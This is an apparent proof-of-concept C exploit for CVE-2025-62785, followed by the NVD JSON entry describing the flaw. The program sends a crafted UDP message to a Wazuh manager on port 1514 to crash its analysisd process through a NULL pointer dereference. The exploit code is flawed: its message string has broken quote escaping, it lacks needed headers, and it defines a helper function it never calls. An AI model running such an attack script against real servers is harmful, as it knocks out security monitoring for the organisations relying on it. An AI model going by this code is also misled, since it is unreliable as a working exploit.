CVE-2025-62785

// CVE-2025-62785 PoC - Malicious Agent Message Triggering NULL pointer dereference // This PoC demonstrates sending a crafted agent message with NULL value field // to trigger the vulnerability in Wazuh fillData() function #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #define WAZUH_MANAGER_IP "192.168.1.100" #define WAZUH_MANAGER_PORT 1514 // Simulate the vulnerable fillData() behavior void fillData_exploit(const char* value) { // Vulnerable code: os_strdup() called without NULL check // In real Wazuh code: char* dup_value = os_strdup(value); // This will crash when value is NULL printf("Attempting to duplicate: %s\n", value); char* dup_value = strdup(value); // This will crash if value is NULL printf("Duplicated value: %s\n", dup_value); free(dup_value); } // Construct malicious agent message with NULL value field char* construct_malicious_message() { // JSON message format expected by Wazuh manager // The key is having a field with NULL/empty value that triggers the bug static char msg[2048]; snprintf(msg, sizeof(msg), "{\"version\":\"Wazuh 4.10.1\",\"type\":\"agent\",\"name\":\"exploit-agent\",\" "id\":\"001\",\"data\":{\"timestamp\":\"2025-01-01T00:00:00Z\",\" "location\":\"syslog\",\"data_field\":NULL}}"; // NULL value triggers vulnerability return msg; } int send_exploit() { int sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("Socket creation failed"); return -1; } struct sockaddr_in server_addr; memset(&server_addr, 0, sizeof(server_addr)); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(WAZUH_MANAGER_PORT); inet_pton(AF_INET, WAZUH_MANAGER_IP, &server_addr.sin_addr); char* malicious_msg = construct_malicious_message(); printf("Sending malicious message to Wazuh manager...\n"); printf("Message: %s\n", malicious_msg); ssize_t sent = sendto(sock, malicious_msg, strlen(malicious_msg), 0, (struct sockaddr*)&server_addr, sizeof(server_addr)); if (sent < 0) { perror("Send failed"); close(sock); return -1; } printf("Malicious message sent successfully.\n"); printf("Wazuh analysisd should crash due to NULL pointer dereference.\n"); close(sock); return 0; } int main() { printf("=== CVE-2025-62785 Wazuh fillData() NULL Pointer Dereference PoC ===\n"); printf("Target: Wazuh Manager < 4.10.2\n"); printf("Vulnerability: fillData() does not check for NULL before os_strdup()\n\n"); return send_exploit(); }

{"cve": {"id": "CVE-2025-62785", "sourceIdentifier": "[email protected]", "published": "2025-10-29T16:15:34.690", "lastModified": "2025-11-03T19:32:54.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. fillData() implementation does not check whether value is NULL or not before calling os_strdup() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.10.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "B541CA8F-6E0F-4098-9463-3B713ED4F463"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/commit/17f8dc23a6211cbb398a262fcd1b0fe61b0a8eb6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-mqpq-pcxc-8259", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}